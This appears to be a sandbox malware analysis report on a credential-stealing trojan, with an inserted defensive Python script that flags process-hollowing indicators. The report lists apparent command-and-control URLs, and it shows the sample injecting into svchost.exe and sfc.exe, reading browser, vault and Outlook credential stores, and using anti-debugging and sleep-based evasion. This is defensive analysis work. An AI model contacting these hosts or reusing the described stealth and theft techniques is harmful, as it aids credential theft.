Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.l33900.xyz/gwiz/
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sfc.exe, 0000000A.00000003.1729877999.0000000008243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2
Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/

            E-Banking Fraud

Source: Yara match | File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_c8567a18-f
            Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ef4607ed-2
            Source: eoIIBcxUj3.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e521e08b-7
            Source: eoIIBcxUj3.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_aa5e896b-6
            Source: eoIIBcxUj3.exe, 00000001.00000003.1229533682.000000000443D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe
            Source: eoIIBcxUj3.exe, 00000001.00000003.1228717172.0000000004293000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe
            Source: eoIIBcxUj3.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@24/6
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | File created: C:\Users\user\AppData\Local\Temp\aut1D06.tmp
            Source: eoIIBcxUj3.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: sfc.exe, 0000000A.00000003.1730860969.0000000003459000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3668125531.0000000003459000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: eoIIBcxUj3.exe | Virustotal: Detection: 75%
            Source: eoIIBcxUj3.exe | ReversingLabs: Detection: 78%
            Source: unknown | Process created: C:\Users\user\Desktop\eoIIBcxUj3.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
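The process-creation rows above already contain the two signals a triager would pull out by hand: svchost.exe is spawned by the sample (not by services.exe) and its command line still names eoIIBcxUj3.exe, i.e. the image on disk and the command line disagree, which is what a hollowed process looks like; and UJarIfYl5U.exe acts as a parent without ever being recorded as a created process. The following script is an added example and not Joe Sandbox code; it restates the four rows with " | " between the report's source and detail columns (that separator, and the three checks, are assumptions of this example) and runs those checks over them.

```python
"""Rebuild the process chain from sandbox 'Process created' rows and flag the
hollowing / masquerading indicators a triager looks for.

Added example for this report; not Joe Sandbox code. The input rows are this
report's four process-creation rows, restated with ' | ' between the report's
source and detail columns (an assumption of this example). The checks are ours.
"""
import ntpath
import re

# Constructed input: the report's process-creation rows, one per line.
SANDBOX_ROWS = r'''
Source: unknown | Process created: C:\Users\user\Desktop\eoIIBcxUj3.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
Source: C:\Windows\SysWOW64\sfc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
'''.strip().splitlines()

# parent image | created image "first quoted token of the command line" optional args
ROW_RE = re.compile(
    r'^Source: (?P<parent>.+?) \| Process created: (?P<image>.+?) "(?P<exe>[^"]+)"(?P<args>.*)$'
)


def parse_rows(rows):
    """Return (parent_image, child_image, cmdline_exe, args) per row; skip rows that do not match."""
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            events.append((m['parent'], m['image'], m['exe'], m['args'].strip()))
    return events


def base(path):
    """Case-folded file name, so comparisons ignore directory and letter case."""
    return ntpath.basename(path).lower()


def process_tree(rows):
    """Map each parent image name to the child image names it spawned, in report order."""
    tree = {}
    for parent, image, _, _ in parse_rows(rows):
        tree.setdefault(base(parent), []).append(base(image))
    return tree


def find_indicators(rows):
    """Run three checks over the chain; each hit is a tuple that starts with its label."""
    events = parse_rows(rows)
    launched = {base(image) for _, image, _, _ in events}
    hits = []
    for parent, image, exe, _ in events:
        # (1) The executable on disk is not the one named on the command line:
        #     the footprint of process hollowing (create suspended, replace image, resume).
        if base(exe) != base(image):
            hits.append(('image_cmdline_mismatch', image, exe))
        # (2) svchost.exe is normally started by services.exe; any other parent is a
        #     masquerading signal worth an alert on its own.
        if base(image) == 'svchost.exe' and base(parent) != 'services.exe':
            hits.append(('uncommon_svchost_parent', parent, image))
        # (3) A parent that never appears as a created process was started out of band;
        #     in this report it is the process the injected svchost.exe wrote into.
        if parent != 'unknown' and base(parent) not in launched:
            hits.append(('parent_without_creation_event', parent))
    return hits


if __name__ == '__main__':
    for parent, children in process_tree(SANDBOX_ROWS).items():
        print(f'{parent} -> {", ".join(children)}')
    for hit in find_indicators(SANDBOX_ROWS):
        print(*hit)
```

Run as-is it prints the tree and three findings: the svchost.exe/eoIIBcxUj3.exe image-versus-command-line mismatch, the uncommon svchost parent, and UJarIfYl5U.exe as a parent with no creation event. The same three checks apply unchanged to Sysmon Event ID 1 or EDR process-start telemetry once the parent image, image and command line fields are mapped to the tuple parse_rows produces.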
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: eoIIBcxUj3.exe | Static file information: File size 1182208 > 1048576
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: eoIIBcxUj3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: wntdll.pdbUGP source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp
            Source: eoIIBcxUj3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: eoIIBcxUj3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: eoIIBcxUj3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: eoIIBcxUj3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: eoIIBcxUj3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Process information set: NOOPENFILEERRORBOX (reported 2 times)
            Source: C:\Windows\SysWOW64\sfc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 5 times)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | API/Special instruction interceptor: Address: 1923234
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D324
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D7E4
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D944
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D504
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D544
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372D1E4
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC3730154
            Source: C:\Windows\SysWOW64\sfc.exe | API/Special instruction interceptor: Address: 7FFCC372DA44
            Source: eoIIBcxUj3.exe, 00000001.00000003.1212031657.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212449596.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212513502.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000002.1231480807.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218663247.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211525976.00000000018F3000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218138625.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212092961.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212307471.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211599534.0000000001903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXEAME1
            Source: C:\Windows\SysWOW64\sfc.exe | Window / User API: threadDelayed 9843
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156 | Thread sleep count: 129 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156 | Thread sleep time: -258000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156 | Thread sleep count: 9843 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156 | Thread sleep time: -19686000s >= -30000s
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752 | Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752 | Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe | Last function: Thread delayed (reported 2 times)
            Source: sfc.exe, 0000000A.00000002.3668125531.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3668874645.00000000012B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.1842602858.00000281E8AEC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sfc.exe | Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtCreateFile: Direct from: 0x77752FEC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtOpenFile: Direct from: 0x77752DCC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtSetInformationThread: Direct from: 0x777463F9
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQueryInformationToken: Direct from: 0x77752CAC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtTerminateThread: Direct from: 0x77752FCC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtProtectVirtualMemory: Direct from: 0x77752F9C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtSetInformationProcess: Direct from: 0x77752C5C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtNotifyChangeKey: Direct from: 0x77753C2C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtOpenKeyEx: Direct from: 0x77752B9C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtOpenSection: Direct from: 0x77752E0C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x777548EC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQueryVolumeInformationFile: Direct from: 0x77752F2C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQuerySystemInformation: Direct from: 0x777548CC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x77752BEC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtDeviceIoControlFile: Direct from: 0x77752AEC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtCreateUserProcess: Direct from: 0x7775371C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtWriteVirtualMemory: Direct from: 0x7775490C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQueryInformationProcess: Direct from: 0x77752C26
